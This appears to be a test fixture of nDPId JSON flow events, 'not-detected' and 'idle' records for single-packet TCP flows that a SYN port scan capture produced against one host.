-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1667,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":636,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1667,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":636,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":62078,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":62078,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":62078,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":62078,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6788,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6788,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1740,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6789,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1740,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6789,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6788,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6788,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1814,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6789,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1814,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6789,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":497,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":646,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":497,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":646,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":534,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":646,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":534,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":646,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1499,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6792,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1499,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6792,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1495,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":648,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1495,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":648,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1554,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":648,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1554,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":648,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1550,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6792,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1550,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6792,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2701,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2701,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1048,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2702,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1048,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2702,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2701,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2701,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2702,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2702,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1436,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2710,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1436,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2710,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1510,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2710,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1510,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2710,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":877,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":877,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":666,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 